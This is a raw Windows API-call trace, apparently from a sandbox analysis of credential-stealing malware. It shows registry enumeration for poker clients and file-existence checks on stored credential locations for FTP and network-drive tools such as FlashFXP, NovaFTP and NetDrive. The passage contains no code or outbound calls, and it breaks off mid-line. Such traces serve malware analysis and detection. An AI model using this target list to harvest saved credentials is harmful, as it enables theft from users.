[0183.826] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0183.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.827] RegCloseKey (hKey=0x220) returned 0x0 [0183.827] GetProcessHeap () returned 0x840000 [0183.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c28 | out: hHeap=0x840000) returned 1 [0183.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.828] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x1, pszName=0x873a58, pcchName=0x19f838 | out: pszName="IM Providers", pcchName=0x19f838) returned 0x0 [0183.828] GetProcessHeap () returned 0x840000 [0183.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0183.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.829] RegOpenKeyW (in: hKey=0x22c, lpSubKey="IM Providers", phkResult=0x871be8 | out: phkResult=0x871be8*=0x220) returned 0x0 [0183.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.830] StrStrW (lpFirst="IM Providers", lpSrch="Full Tilt Poker") returned 0x0 [0183.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.832] RegCloseKey (hKey=0x220) returned 0x0 [0183.832] GetProcessHeap () returned 0x840000 [0183.832] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0183.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.832] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x2, pszName=0x873a58, pcchName=0x19f838 | out: pszName="Microsoft", pcchName=0x19f838) returned 0x0 [0183.832] GetProcessHeap () returned 0x840000 [0183.832] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bb8 [0183.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.835] RegOpenKeyW (in: hKey=0x22c, lpSubKey="Microsoft", phkResult=0x871bb8 | out: phkResult=0x871bb8*=0x220) returned 0x0 [0183.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.836] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0183.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.837] RegCloseKey (hKey=0x220) returned 0x0 [0183.837] GetProcessHeap () returned 0x840000 [0183.837] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bb8 | out: hHeap=0x840000) returned 1 [0183.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.838] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x3, pszName=0x873a58, pcchName=0x19f838 | out: pszName="Netscape", pcchName=0x19f838) returned 0x0 [0183.838] GetProcessHeap () returned 0x840000 [0183.838] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0183.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.840] RegOpenKeyW (in: hKey=0x22c, lpSubKey="Netscape", phkResult=0x871c08 | out: phkResult=0x871c08*=0x220) returned 0x0 [0183.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.841] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0183.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.873] RegCloseKey (hKey=0x220) returned 0x0 [0183.873] GetProcessHeap () returned 0x840000 [0183.873] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0183.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.874] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x4, pszName=0x873a58, pcchName=0x19f838 | out: pszName="ODBC", pcchName=0x19f838) returned 0x0 [0183.874] GetProcessHeap () returned 0x840000 [0183.874] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bf8 [0183.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.875] RegOpenKeyW (in: hKey=0x22c, lpSubKey="ODBC", phkResult=0x871bf8 | out: phkResult=0x871bf8*=0x220) returned 0x0 [0183.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.876] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0183.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.877] RegCloseKey (hKey=0x220) returned 0x0 [0183.877] GetProcessHeap () returned 0x840000 [0183.877] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bf8 | out: hHeap=0x840000) returned 1 [0183.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.878] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x5, pszName=0x873a58, pcchName=0x19f838 | out: pszName="Policies", pcchName=0x19f838) returned 0x0 [0183.878] GetProcessHeap () returned 0x840000 [0183.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0183.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.880] RegOpenKeyW (in: hKey=0x22c, lpSubKey="Policies", phkResult=0x871b48 | out: phkResult=0x871b48*=0x220) returned 0x0 [0183.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.881] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0183.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.882] RegCloseKey (hKey=0x220) returned 0x0 [0183.882] GetProcessHeap () returned 0x840000 [0183.882] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0183.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.883] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x6, pszName=0x873a58, pcchName=0x19f838 | out: pszName="RegisteredApplications", pcchName=0x19f838) returned 0x0 [0183.883] GetProcessHeap () returned 0x840000 [0183.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0183.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.884] RegOpenKeyW (in: hKey=0x22c, lpSubKey="RegisteredApplications", phkResult=0x871b08 | out: phkResult=0x871b08*=0x220) returned 0x0 [0183.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.885] StrStrW (lpFirst="RegisteredApplications", lpSrch="Full Tilt Poker") returned 0x0 [0183.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.893] RegCloseKey (hKey=0x220) returned 0x0 [0183.894] GetProcessHeap () returned 0x840000 [0183.894] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0183.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.894] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x7, pszName=0x873a58, pcchName=0x19f838 | out: pszName="Wow6432Node", pcchName=0x19f838) returned 0x0 [0183.895] GetProcessHeap () returned 0x840000 [0183.895] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0183.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.896] RegOpenKeyW (in: hKey=0x22c, lpSubKey="Wow6432Node", phkResult=0x871c68 | out: phkResult=0x871c68*=0x220) returned 0x0 [0183.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.897] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0183.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.898] RegCloseKey (hKey=0x220) returned 0x0 [0183.898] GetProcessHeap () returned 0x840000 [0183.898] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0183.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.899] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x8, pszName=0x873a58, pcchName=0x19f838 | out: pszName="Classes", pcchName=0x19f838) returned 0x0 [0183.899] GetProcessHeap () returned 0x840000 [0183.899] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871cb8 [0183.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.900] RegOpenKeyW (in: hKey=0x22c, lpSubKey="Classes", phkResult=0x871cb8 | out: phkResult=0x871cb8*=0x220) returned 0x0 [0183.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.901] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0183.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.903] RegCloseKey (hKey=0x220) returned 0x0 [0183.903] GetProcessHeap () returned 0x840000 [0183.903] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871cb8 | out: hHeap=0x840000) returned 1 [0183.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.904] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x9, pszName=0x873a58, pcchName=0x19f838 | out: pszName="", pcchName=0x19f838) returned 0x103 [0183.904] GetProcessHeap () returned 0x840000 [0183.904] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.906] RegCloseKey (hKey=0x22c) returned 0x0 [0183.906] GetProcessHeap () returned 0x840000 [0183.906] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0183.906] GetProcessHeap () returned 0x840000 [0183.906] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.906] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.907] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0183.913] Sleep (dwMilliseconds=0xa) [0183.963] GetProcessHeap () returned 0x840000 [0183.963] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x875288 [0183.964] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.964] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s", arglist=0x19f5c8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*") returned 47 [0183.964] GetProcessHeap () returned 0x840000 [0183.965] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x62) returned 0x871d38 [0183.965] GetProcessHeap () returned 0x840000 [0183.965] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.965] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*", lpFindFileData=0x19f5dc | out: lpFindFileData=0x19f5dc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x84aa08, ftLastWriteTime.dwLowDateTime=0x84a8a0, ftLastWriteTime.dwHighDateTime=0x861d78, nFileSizeHigh=0x8623c8, nFileSizeLow=0x0, dwReserved0=0x19f634, dwReserved1=0x77290568, cFileName="", cAlternateFileName="ᕿ酰꿯憫")) returned 0xffffffff [0183.965] GetProcessHeap () returned 0x840000 [0183.965] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.965] GetProcessHeap () returned 0x840000 [0183.965] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.965] GetProcessHeap () returned 0x840000 [0183.965] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0183.965] GetProcessHeap () returned 0x840000 [0183.965] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872310 [0183.965] GetProcessHeap () returned 0x840000 [0183.966] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87a228 [0183.966] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.966] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x87a228 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0183.967] GetProcessHeap () returned 0x840000 [0183.967] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5a) returned 0x875288 [0183.967] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.968] wvsprintfW (in: param_1=0x875288, param_2="%s\\ExpanDrive", arglist=0x19f82c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0183.968] GetProcessHeap () returned 0x840000 [0183.968] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0183.968] GetProcessHeap () returned 0x840000 [0183.968] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.969] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0183.969] GetProcessHeap () returned 0x840000 [0183.969] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0183.969] GetProcessHeap () returned 0x840000 [0183.969] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.969] GetProcessHeap () returned 0x840000 [0183.969] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87a228 [0183.970] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.970] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x87a228 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0183.970] GetProcessHeap () returned 0x840000 [0183.970] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5a) returned 0x875288 [0183.971] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.972] wvsprintfW (in: param_1=0x875288, param_2="%s\\ExpanDrive", arglist=0x19f814 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0183.972] GetProcessHeap () returned 0x840000 [0183.972] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0183.972] GetProcessHeap () returned 0x840000 [0183.972] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.973] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0183.973] GetProcessHeap () returned 0x840000 [0183.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0183.973] GetProcessHeap () returned 0x840000 [0183.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.973] GetProcessHeap () returned 0x840000 [0183.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.973] GetProcessHeap () returned 0x840000 [0183.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872310 | out: hHeap=0x840000) returned 1 [0183.973] GetProcessHeap () returned 0x840000 [0183.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6c) returned 0x875288 [0183.974] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.975] wvsprintfW (in: param_1=0x875288, param_2="%s\\Steed\\bookmarks.txt", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 57 [0183.975] GetProcessHeap () returned 0x840000 [0183.975] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x76) returned 0x861718 [0183.975] GetProcessHeap () returned 0x840000 [0183.975] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.976] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 0 [0183.976] GetProcessHeap () returned 0x840000 [0183.976] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861718 | out: hHeap=0x840000) returned 1 [0183.976] GetProcessHeap () returned 0x840000 [0183.976] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x400) returned 0x873a58 [0183.976] GetProcessHeap () returned 0x840000 [0183.976] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872310 [0183.976] GetProcessHeap () returned 0x840000 [0183.976] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87a228 [0183.977] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.978] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x87a228 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0183.978] GetProcessHeap () returned 0x840000 [0183.978] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f56) returned 0x875288 [0183.979] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.980] wvsprintfW (in: param_1=0x875288, param_2="%s\\FlashFXP", arglist=0x19f830 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0183.980] GetProcessHeap () returned 0x840000 [0183.980] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0183.980] GetProcessHeap () returned 0x840000 [0183.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.981] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0183.982] GetProcessHeap () returned 0x840000 [0183.982] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0183.982] GetProcessHeap () returned 0x840000 [0183.982] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.982] GetProcessHeap () returned 0x840000 [0183.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87a228 [0183.982] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.983] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x87a228 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0183.983] GetProcessHeap () returned 0x840000 [0183.983] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f56) returned 0x875288 [0183.984] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.985] wvsprintfW (in: param_1=0x875288, param_2="%s\\FlashFXP", arglist=0x19f818 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0183.985] GetProcessHeap () returned 0x840000 [0183.985] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0183.994] GetProcessHeap () returned 0x840000 [0183.994] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.995] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0183.995] GetProcessHeap () returned 0x840000 [0183.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0183.995] GetProcessHeap () returned 0x840000 [0183.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.995] GetProcessHeap () returned 0x840000 [0183.995] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87a228 [0183.996] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.996] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x87a228 | out: pszPath="C:\\ProgramData") returned 0x0 [0183.997] GetProcessHeap () returned 0x840000 [0183.997] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f56) returned 0x875288 [0183.998] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.999] wvsprintfW (in: param_1=0x875288, param_2="%s\\FlashFXP", arglist=0x19f800 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0183.999] GetProcessHeap () returned 0x840000 [0183.999] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x32) returned 0x866af0 [0183.999] GetProcessHeap () returned 0x840000 [0183.999] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.000] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0184.000] GetProcessHeap () returned 0x840000 [0184.000] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0184.000] GetProcessHeap () returned 0x840000 [0184.000] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x866af0 | out: hHeap=0x840000) returned 1 [0184.000] GetProcessHeap () returned 0x840000 [0184.000] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87a228 [0184.001] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.002] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x87a228 | out: pszPath="C:\\ProgramData") returned 0x0 [0184.002] GetProcessHeap () returned 0x840000 [0184.002] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f56) returned 0x875288 [0184.003] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.004] wvsprintfW (in: param_1=0x875288, param_2="%s\\FlashFXP", arglist=0x19f830 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0184.004] GetProcessHeap () returned 0x840000 [0184.004] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x32) returned 0x866bb0 [0184.004] GetProcessHeap () returned 0x840000 [0184.004] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.005] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0184.005] GetProcessHeap () returned 0x840000 [0184.005] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0184.005] GetProcessHeap () returned 0x840000 [0184.005] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x866bb0 | out: hHeap=0x840000) returned 1 [0184.005] GetProcessHeap () returned 0x840000 [0184.005] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.005] GetProcessHeap () returned 0x840000 [0184.005] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872310 | out: hHeap=0x840000) returned 1 [0184.005] GetProcessHeap () returned 0x840000 [0184.005] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.006] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.007] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.007] GetProcessHeap () returned 0x840000 [0184.007] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x875288 [0184.008] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.009] wvsprintfW (in: param_1=0x875288, param_2="%s\\INSoftware\\NovaFTP\\NovaFTP.db", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 65 [0184.009] GetProcessHeap () returned 0x840000 [0184.009] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879248 [0184.009] GetProcessHeap () returned 0x840000 [0184.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.010] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 0 [0184.010] GetProcessHeap () returned 0x840000 [0184.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879248 | out: hHeap=0x840000) returned 1 [0184.010] GetProcessHeap () returned 0x840000 [0184.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.010] GetProcessHeap () returned 0x840000 [0184.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x875288 [0184.011] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.012] wvsprintfW (in: param_1=0x875288, param_2="%s\\NetDrive\\NDSites.ini", arglist=0x19f844 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 58 [0184.012] GetProcessHeap () returned 0x840000 [0184.012] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x78) returned 0x861518 [0184.012] GetProcessHeap () returned 0x840000 [0184.012] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.013] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 0 [0184.014] GetProcessHeap () returned 0x840000 [0184.014] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861518 | out: hHeap=0x840000) returned 1 [0184.014] GetProcessHeap () returned 0x840000 [0184.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x875288 [0184.015] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.015] wvsprintfW (in: param_1=0x875288, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19f838 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 58 [0184.015] GetProcessHeap () returned 0x840000 [0184.015] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x78) returned 0x860998 [0184.016] GetProcessHeap () returned 0x840000 [0184.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.017] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 0 [0184.017] GetProcessHeap () returned 0x840000 [0184.017] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860998 | out: hHeap=0x840000) returned 1 [0184.017] GetProcessHeap () returned 0x840000 [0184.017] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.018] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.018] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\ProgramData") returned 0x0 [0184.018] GetProcessHeap () returned 0x840000 [0184.018] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x875288 [0184.019] LoadLibraryW (lpLibFileName="user32") returned 